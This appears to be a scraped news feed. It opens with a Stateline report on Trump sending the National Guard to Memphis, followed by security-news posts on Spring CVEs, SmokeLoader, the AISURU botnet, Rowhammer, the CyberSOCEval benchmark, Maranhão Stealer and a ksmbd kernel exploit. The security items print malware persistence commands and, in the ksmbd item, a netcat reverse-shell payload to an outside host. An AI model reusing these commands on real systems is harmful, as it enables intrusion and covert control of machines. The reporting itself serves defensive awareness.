• President Donald Trump Monday directed Tennessee's National Guard deployed to the Democratic-led city of Memphis, following similar actions in the District of Columbia that Trump has said were needed to tackle crime. 

    “We’re going to make Memphis safe again," Trump said.

    It’s the latest test of Trump’s presidential powers in using the U.S. military domestically, despite a law that bars soldiers from partaking in local law enforcement. Trump said his efforts in the district – using the National Guard – would be replicated in cities across the country.

    In the Oval Office, flanked by Tennessee’s GOP Gov. Bill Lee and the state’s Republican U.S. senators, Bill Hagerty and Marsha Blackburn, the president signed a presidential memorandum to establish a “Memphis Safe Task Force” to address violent crime using federal law enforcement and agencies. 

    “We're sending in the big force,” Trump said. 

    Multiple federal agencies

    In addition to the National Guard, the task force will include the U.S. Marshals Service, FBI, Drug Enforcement Agency, Homeland Security Investigations and U.S. Immigration and Customs Enforcement agents. It’s unclear how many Guard members or members of federal law enforcement will be sent. 

    “This task force will be a replica of our extraordinarily successful efforts here, and you'll see it's a lot of the same thing,” Trump said of using the National Guard in the district. 

    It’s the first time Trump has sent the National Guard into a red state, after seizing control of the California National Guard from the state’s governor — a Democrat — for deployment in Los Angeles, and then sending Guard members to the district, another Democratic stronghold. 

    While homicide rates remain high in Memphis compared to the nation, murders overall from 2023 to 2024 have decreased by 14%, according to the most recent data from the Memphis Shelby Crime Commission.

    The Memphis mayor's office could not immediately be reached for comment. 

    Trump added that St. Louis, Missouri, could also see similar action. 

    Other cities

    The dispatch of the National Guard to Tennessee comes after Trump has threatened to send troops to other cities including New OrleansPortland, Oregon; and Chicago. Illinois Gov. J.B. Pritzker pushed back and the president had backed off his threat, though he mentioned the city again on Monday. 

    Governors have control over their state National Guard except in rare circumstances where the president can seize control. Pritzker has repeatedly rejected the idea of sending the National Guard into Chicago.

    “If we don’t have the governor's help we’re doing it without him,” Trump said of Pritzker. 

    With Memphis, Lee welcomed the intervention and thanked Trump for directing federal resources to the city. 

    “We are very hopeful and excited about the prospect of moving that city forward,” Lee said. 

    This story was originally published by Stateline.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Two critical vulnerabilities, CVE-2025-41248 and CVE-2025-41249, have emerged in Spring Security and Spring Framework that could allow attackers to bypass authorization controls in enterprise applications. 

    These flaws arise when using Spring Security’s @EnableMethodSecurity feature in conjunction with method-level annotations such as @PreAuthorize and @PostAuthorize. 

    In applications where service interfaces or abstract base classes employ unbounded generics, the annotation detection mechanism may fail to locate security annotations on overridden methods, enabling unauthorized access to protected endpoints. 

    Key Takeaways
    1. Spring Security 6.4.x/6.5.x ignores method-level annotations, enabling bypass.
    2. Spring Framework 5.3.x/6.1.x/6.2.x fails to detect annotations.
    3. Upgrade to fixed versions or redeclare annotations on concrete classes.

    Both the authorization bypass and annotation detection flaws are classified as Medium severity and impact a wide range of Spring Security and Spring Framework versions spanning the 5.x through 6.x release trains.

    Authorization Bypass Vulnerability (CVE-2025-41248)

    CVE-2025-41248 targets Spring Security versions 6.4.0 through 6.4.9 and 6.5.0 through 6.5.3. 

    When a parameterized superclass defines a secured method signature, and a subclass fails to redeclare the relevant annotation, the framework’s metadata resolver does not traverse the generic type hierarchy correctly. 

    Attackers may exploit this logic gap by invoking secured operations defined only on a generic interface, bypassing authorization checks that rely on @PreAuthorize(“hasRole(‘ADMIN’)”) or similar SpEL expressions. 

    The vulnerability yields a CVSS 3.1 base score of 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

    Annotation Detection Vulnerability (CVE-2025-41249)

    CVE-2025-41249 affects Spring Framework core modules in versions 5.3.0 through 5.3.44, 6.1.0 through 6.1.22, and 6.2.0 through 6.2.10. 

    In this case, the annotation detection flaw impedes recognition of any method annotation used for authorization or auditing when defined on a generic base class. 

    Without the annotation metadata, Spring Security cannot enforce method-level security constraints.

    Both vulnerabilities stem from improper handling of unbounded generics during annotation introspection, causing the runtime to ignore security metadata and treat sensitive service methods as if they were unprotected.

    CVETitleCVSS 3.1 ScoreSeverity
    CVE-2025-41248Spring Security authorization bypass for method security annotations on parameterized types6.5Medium
    CVE-2025-41249Spring Framework annotation detection vulnerability on generic superclasses6.5Medium

    Mitigations

    Spring maintainers have released fixed versions for all affected modules. For Spring Security, users should upgrade to 6.4.10 or 6.5.4. 

    For Spring Framework, the recommended upgrades are 5.3.45, 6.1.23, and 6.2.11. Full mitigation details are available in the Spring Security Advisories and RSS feed. 

    Teams unable to upgrade immediately can enforce a temporary workaround by declaring all secured methods directly in the concrete class rather than relying on inherited annotations from generic superclasses. 

    Ensuring consistent use of @PreAuthorize, @PostAuthorize, and other method security annotations on each implementing class will prevent the bypass.

    Development teams are urged to review their service interfaces for usage of @EnableMethodSecurity in conjunction with generics. 

    Static analysis tools and custom annotation scanning scripts should be updated to detect annotated methods correctly across type hierarchies. 

    Security teams must prioritize these upgrades in CI/CD pipelines to avoid inadvertent exposure of protected APIs. Continuous validation of method-level security, combined with code reviews focusing on generic service patterns, will strengthen authorization enforcement and guard against similar flaws.

    Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

    The post Spring Framework Security Flaws Enable Authorization Bypass and Annotation Detection Issues appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • SmokeLoader, first seen on criminal forums in 2011, has evolved into a highly modular malware loader designed to deliver a variety of second-stage payloads, including trojans, ransomware, and credential stealers.

    After Operation Endgame disrupted numerous campaigns in mid-2024, the loader reemerged in early 2025 as two distinct variants: version 2025 alpha and version 2025.

    Both variants address previous performance bugs, enhance evasion capabilities, and expand the plugin framework that enables disparate malicious activities.

    Zscaler researchers noted that these updates allow SmokeLoader to operate more stealthily and efficiently on compromised hosts.

    Initially, SmokeLoader’s primary function was to inject a main module into Windows Explorer for persistent execution and beaconing to command-and-control (C2) servers.

    The stager, responsible for this injection, previously lacked proper checks and would continually inject new copies of the module at ten-minute intervals, resulting in severe performance degradation.

    Zscaler analysts identified that version 2025 alpha introduced a mutex check in the stager, terminating the injection process if the mutex already exists.

    Mutex Code (Source – Zscaler)

    This mutex generation algorithm, which derives a random lowercase string based on the first four bytes of the bot ID, prevents repeated injections and conserves system resources.

    Beyond loader stability, SmokeLoader’s plugin framework has matured significantly. Operators can optionally deploy modules that harvest browser credentials, hijack sessions, perform distributed denial-of-service (DoS) attacks, and mine cryptocurrency.

    Each plugin is delivered as a second-stage payload, triggered based on configuration flags received from the C2.

    This flexibility allows threat actors to tailor payloads to specific objectives, from data exfiltration in targeted espionage to volumetric DoS in extortion campaigns.

    Infection Mechanism and Persistence

    SmokeLoader’s infection chain begins with a reconnaissance email or exploit kit that delivers the stager as a shellcode-packed executable.

    Upon execution, the stager resolves Windows API dependencies by hash, decrypts code blocks with a hardcoded offset, and injects the main module into the explorer.exe process using 64-bit shellcode.

    Once inside explorer.exe, the main module creates a scheduled task for persistence, now named “MicrosoftEdgeUpdateTaskMachine%hs,” where the placeholder is the first 16 characters of the bot ID.

    SmokeLoader execution process control flow (Source – Zscaler)

    This contrasts with earlier variants that used “Firefox Default Browser Agent %hs,” evidencing the author’s attempt to masquerade as legitimate update services.

    After establishing persistence, the main module generates the same mutex to avoid duplicate execution and begins beaconing to C2 servers using an updated protocol that includes a four-byte CRC32 checksum.

    This checksum is calculated over the payload starting at offset six, ensuring integrity and hindering simplistic network detections.

    The response handling also changed: the initial four-byte command length field is now XOR-obfuscated with the RC4 key, complicating static signature matching.

    Throughout this process, Zscaler analysts observed that SmokeLoader’s network communications consistently mimic legitimate browser user agents and TLS handshakes, further blending malicious traffic with normal web browsing.

    By integrating both stager and main-module enhancements along with versatile plugins, SmokeLoader remains a potent threat for data theft and DoS operations under a single, adaptable framework.

    Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

    The post SmokeLoader Utilizes Optional Plugins To Perform Tasks Such as Stealing Data and DoS Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Since early 2025, the cybersecurity community has witnessed an unprecedented surge in distributed denial-of-service (DDoS) bandwidth, culminating in a record-shattering 11.5 Tbps assault attributed to a botnet named AISURU.

    Emerging from XLab’s continuous monitoring of global DDoS incidents, this botnet leveraged compromised router firmware to amass approximately 300,000 active devices worldwide.

    Researchers first detected unusual spikes of malicious traffic targeting major infrastructure providers, prompting deeper investigation into the underlying threat.

    XLab analysts noted striking similarities between AISURU’s attack methodology and earlier campaigns, yet the scale and sophistication of this operation far surpassed previous benchmarks.

    Propagation of AISURU began in April 2025 when threat actors exploited a vulnerability in Totolink router firmware update servers.

    By altering the firmware URL to point to a malicious script, every device performing an automatic update became infected.

    In a matter of weeks, the size of AISURU’s network swelled to over 100,000 routers, and by September 2025, the botnet had consolidated around 300,000 nodes.

    XLab researchers identified the use of GRE tunneling to distribute traffic loads across multiple command-and-control (C2) servers, enabling the botnet to orchestrate a simultaneous flood of packets that overwhelmed target networks with ease.

    Cloudflare Mitigates 11.5 Tbps DDoS Attack (Source – XLab)

    The impact of the 11.5 Tbps attack was felt globally as service providers scrambled to mitigate the flood of SYN, UDP, and DNS amplification requests.

    Affected organizations reported intermittent outages and service degradation, highlighting the potency of combining large-scale IoT compromise with advanced evasion techniques.

    XLab analysts identified the rapid shift from traditional amplification vectors to custom-crafted packet sequences designed to bypass legacy mitigation tools, an innovation that allowed AISURU to set new world records in DDoS throughput.

    While AISURU’s distributed architecture and bandwidth capacity are staggering on their own, the malware’s underlying behavior reveals a deeper level of technical refinement.

    Its dual-version propagation engine demonstrates continuous evolution, integrating both zero-day exploits and known N-day vulnerabilities to expand its reach.

    Equally concerning is its modular design, which facilitates swift updates to encryption, communication protocols, and attack commands without requiring a complete overhaul of the malware codebase.

    Infection Mechanism: Firmware Update Hijacking

    Delving into AISURU’s infection mechanism uncovers a deceptively simple yet devastating approach.

    In April 2025, attackers breached Totolink’s firmware update server, planting a shell script named t.sh that redirected devices to download the AISURU payload.

    Once executed, the script set up persistent execution by modifying /etc/rc.local entries and disabling the Linux OOM Killer via /proc/self/oom_score_adj, ensuring the bot remained resident across reboots.

    The payload binary, renamed to libcow.so, avoided detection by masquerading as a common system daemon such as telnetd or dhclient.

    Upon initialization, AISURU performs environment checks to terminate itself under virtualized or analysis environments by scanning for virtualization artifacts and debugging tools.

    It then establishes a secure channel with C2 servers via a custom AES-XOR hybrid protocol, exchanging commands that range from DDoS instructions to residential proxy assignments.

    One illustrative snippet of the persistence routine follows:-

    # Persistence setup in /etc/rc.local
    echo "/usr/lib/libcow.so &" >> /etc/rc.local
    chmod +x /usr/lib/libcow.so
    Malicious script (Source – XLab)

    This mechanism underscores the threat actors’ mastery over both traditional Linux administration and bespoke malware engineering, enabling AISURU to maintain dominance in the DDoS ecosystem.

    Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

    The post AISURU Botnet With 300,000 Hijacked Routers Behind The Recent Massive 11.5 Tbps DDoS Attack appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A new variation of the Rowhammer attack, named Phoenix, breaks through the built-in defenses of modern DDR5 memory modules. Researchers reverse-engineered the in-DRAM protections on SK Hynix chips and found blind spots that let them flip bits despite the most advanced hardware safeguards. Their work shows that every tested DDR5 module from the world’s largest DRAM […]

    The post New Phoenix Rowhammer Attack Bypasses DDR5 Chip Protections appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The newly identified AISURU botnet, leveraging an estimated 300,000 compromised routers worldwide, has been pinpointed as the force behind a record-shattering 11.5 Tbps distributed denial-of-service (DDoS) attack in September 2025. This unprecedented assault eclipses the previous 5.8 Tbps peak seen earlier in the year and underscores a dangerous escalation in botnet scale and sophistication. First […]

    The post AISURU Botnet Fuels Record-Breaking 11.5 Tbps DDoS Attack With 300,000 Hijacked Routers appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A groundbreaking open-source benchmark suite called CyberSOCEval has emerged as the first comprehensive evaluation framework for Large Language Models (LLMs) in Security Operations Center (SOC) environments. 

    Released as part of CyberSecEval 4, this innovative benchmark addresses critical gaps in cybersecurity AI evaluation by focusing on two essential defensive domains: Malware Analysis and Threat Intelligence Reasoning.

    The research, conducted by Meta and CrowdStrike, reveals that current AI systems are far from saturating these security-focused evaluations, with accuracy scores ranging from approximately 15% to 28% on malware analysis tasks and 43% to 53% on threat intelligence reasoning. 

    Key Takeaways
    1. CyberSOCEval, the first open-source benchmark testing LLMs on Security Operations Center tasks.
    2. Current LLMs achieve only 15-28% accuracy on malware analysis and 43-53% on threat intelligence.
    3. 609 malware questions and 588 threat intelligence questions evaluate AI systems on JSON logs, MITRE ATT&CK mappings, and complex attack chains.

    These results highlight significant opportunities for improvement in AI cyber defense capabilities.

    CyberSOCEval Malware Analysis

    CyberSOCEval’s Malware Analysis component leverages real sandbox detonation data from CrowdStrike Falcon® Sandbox, creating 609 question-answer pairs across five malware categories, including ransomware, Remote Access Trojans (RATs), infostealers, EDR/AV killers, and UM unhooking techniques. 

    The benchmark evaluates AI systems’ ability to interpret complex JSON-formatted system logs, process trees, network traffic, and MITRE ATT&CK framework mappings.

    Technical specifications include support for models with up to 128,000 token context windows, with filtering mechanisms that reduce report size while maintaining performance integrity. 

    The evaluation covers critical cybersecurity concepts, including T1055.001 (Process Injection), T1112 (Registry Run Keys), and API calls like CreateRemoteThread, VirtualAlloc, and WriteProcessMemory.

    The Threat Intelligence Reasoning benchmark processes 588 question-answer pairs derived from 45 distinct threat intelligence reports sourced from CrowdStrike, CISA, NSA, and IC3. 

    Unlike existing frameworks such as CTIBench and SEvenLLM, CyberSOCEval incorporates multimodal intelligence reports combining textual indicators of compromise (IOCs) with tables and diagrams.

    The evaluation methodology employs both category-based and relationship-based question generation using Llama 3.2 90B and Llama 4 Maverick models. 

    Detonation report distribution by malware attack & Distribution by topic and difficulty

    Detonation report distribution by malware attack & Distribution by topic and difficulty

    Questions require multi-hop reasoning across threat actor relationships, malware attribution, and complex attack chain analysis mapped to frameworks like MITRE ATT&CK.

    Reasoning models leveraging test-time scaling did not demonstrate the performance improvements observed in coding and mathematics domains, suggesting cybersecurity-specific reasoning training represents a key development opportunity, Meta said.

    The benchmark’s open-source nature encourages community contributions and provides practitioners with reliable model selection metrics while offering AI developers a clear development roadmap for enhancing cyber defense capabilities.

    Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

    The post Open Source CyberSOCEval Sets New Standards for AI in Malware Analysis and Threat Intelligence appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Since May 2025, a novel credential stealer dubbed Maranhão Stealer has emerged as a significant threat to users of pirated gaming software. Distributed through deceptive websites hosting cracked launchers and cheats, the malware leverages cloud-hosted platforms to deliver trojanized installers that appear innocuous.

    Upon execution, the installer unpacks a Node.js–compiled binary encapsulated in an Inno Setup executable, initiating a silent infection process that avoids user detection while harvesting sensitive data.

    In its initial campaigns, threat actors attracted victims with enticing download links such as DerelictSetup.zip, promising modified game content.

    Behind the scenes, however, the Inno Setup wrapper drops several components, including updater.exe, crypto.key, and infoprocess.exe, into a hidden “Microsoft Updater” directory under %localappdata%\Programs.

    Infection chain (Source – Cyble)

    Cyble analysts noted that the malware establishes persistence through Run registry keys and scheduled tasks immediately after deployment.

    The impact of Maranhão Stealer extends beyond simple credential theft. By injecting a reflective DLL into browser processes, it bypasses security measures like AppBound encryption to exfiltrate stored passwords, cookies, and browsing history from Chrome, Edge, Brave, Opera, and other Chromium-based browsers.

    Cyble researchers identified that the malware also targets cryptocurrency wallets—Electrum, Exodus, Coinomi, and more—making it a dual threat to both traditional account credentials and digital asset wallets.

    In addition to credential harvesting, Maranhão Stealer conducts extensive system reconnaissance. It gathers hardware and network information via WMI queries such as wmic os get Caption and external API calls to ip-api.com/json, profiling the operating system, CPU, disk space, and geographic location of the infected host.

    Screenshots captured through inline C# in PowerShell further augment the stolen intelligence, enabling threat actors to monitor user activity in real time.

    Infection Mechanism

    A closer examination of the infection mechanism reveals a multi-stage process designed for stealth and reliability.

    Upon execution of the Inno Setup installer, the main payload (updater.exe) is launched in /VERYSILENT mode, suppressing any installation dialogs.

    Persistence is immediately secured with a registry modification:-

    reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "C:\Users\<username>\AppData\Local\Programs\Microsoft Updater\Updater.exe" /f
    Persistence through registry (Source – Cyble)

    Once the Run key is in place, the malware marks its directory and files with hidden and system attributes through attrib +h +s, ensuring they remain obscured from casual inspection.

    The next phase involves spawning a helper process, infoprocess.exe, which injects a payload DLL directly into running browser processes.

    Using low-level Windows APIs—NtAllocateVirtualMemory, NtWriteProcessMemory, and CreateThreadEx—the malicious module is mapped into the target’s memory space without touching the disk.

    This reflective injection technique not only evades antivirus scans but also runs inside the context of legitimate browser executables, making detection even more challenging.

    By combining social engineering, cloud-based distribution, and advanced injection tactics, Maranhão Stealer exemplifies the evolving sophistication of modern credential stealers.

    Security teams should prioritize application control policies, endpoint monitoring for anomalous registry edits, and behavioral analysis to detect and block such stealthy threats in their early stages.

    Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

    The post New Maranhão Stealer Via Pirated Software Leveraging Cloud-Hosted Platforms to Steal Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A 0-Click Linux Kernel KSMBD RCE Exploit From N-Day Vulnerabilities, achieving remote code execution on a two-year-out-of-date Linux 6.1.45 instance running the kernelspace SMB3 daemon, ksmbd. 

    By chaining two authenticated N-day flaws, CVE-2023-52440 and CVE-2023-4130, the exploit attains an unauthenticated SLUB overflow and an out-of-bounds heap read primitive, culminating in a user-mode helper invocation and reverse shell without any manual interaction.

    Key Takeaways
    1. Chained two ksmbd N-day bugs SLUB overflow and OOB read to achieve 0-click RCE.
    2. Heap-sprayed and overflowed kmalloc slabs to bypass KASLR and hijack a forged vtable.
    3. Executed a ROP chain via call_usermodehelper() for a reverse shell.

    Targeting ksmbd: A Kernelspace SMB3 Daemon

    Eternal-Tux reports that the ksmbd module implements an in-kernel SMB3 server to offload performance-critical tasks from userspace. Its challenge-response NTLM authentication and extended attribute handling introduced two high-severity bugs in 2023 and 2024. 

    CVE-2023-52440 arises in ksmbd_decode_ntlmssp_auth_blob(), where an unchecked sess_key_len leads to a controlled SLUB overflow during cifs_arc4_crypt(). 

    By setting the session_key to an attacker-supplied blob via Impacket’s ntlmChallengeResponse, the exploit gains a reliable heap-overflow primitive. 

    Next, CVE-2023-4130 resides in smb2_set_ea(), where improper length validation of smb2_ea_info entries enables an authenticated OOB read of adjacent heap chunks into an extended attribute. 

    Evil smb2_ea_info object
    Evil smb2_ea_info object

    The researcher leveraged Impacket’s setInfo() and queryInfo() functions to craft malicious EA buffers and leak kernel heap contents, performing a KASLR bypass and precise heap grooming.

    The Exploit Chain

    On a single-core testbed with standard mitigations enabled (SMEP, SMAP, KPTI, KASLR, hardened SLUB), the exploit begins by spraying multiple TCP connections to allocate pairs of ksmbd_conn (kmalloc-1k) and ksmbd_session (kmalloc-512) objects. 

    A “spray, leak, retry” loop ensures a valid session leak, while an “overflow, oracle, retry” pattern isolates the overflowed connection. 

    By abusing the SLUB overflow, the attacker corrupts the Preauth_HashValue pointer in a ksmbd_session, converting it into an arbitrary free on kmalloc-1k. 

    Overflow and corruption of ksmbd_session object
    Overflow and corruption of ksmbd_session object

    Subsequent EA-based leaks identify a target ksmbd_conn object, revealing kernel pointers and computing the KASLR base. With precise offsets in hand, a second SLUB overflow triggers an arbitrary free and reallocation of a forged vtable object. 

    The corrupted local_nls pointer in ksmbd_conn is overwritten to point to a fake vtable containing ROP gadgets: pop rdi; ret, pop rsi; ret, pop rdx; ret, pop rcx; ret, and a leave; ret stack pivot. 

    The final payload invokes call_usermodehelper(“/usr/bin/nc.traditional”, “-e”, “/bin/sh”, “ctfi.ng”, “16549”) followed by msleep() to freeze the kernel thread, spawning a reverse shell on port 16549.

    Although ksmbd sees limited production deployment, this exploit chain underscores the kernel’s expanding attack surface as userspace modules migrate into kernelspace. 

    Eternal-Tux’s research exemplifies the evolving sophistication of N-day exploit development and the critical need for rigorous kernel vulnerability management.

    Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

    The post 0-Click Linux Kernel KSMBD RCE Exploit From N-Day Vulnerabilities appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A team of academics from ETH Zürich and Google has discovered a new variant of a RowHammer attack targeting Double Data Rate 5 (DDR5) memory chips from South Korean semiconductor vendor SK Hynix. The RowHammer attack variant, codenamed Phoenix (CVE-2025-6202, CVSS score: 7.1), is capable of bypassing sophisticated protection mechanisms put in place to resist the attack. “We have proven that

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶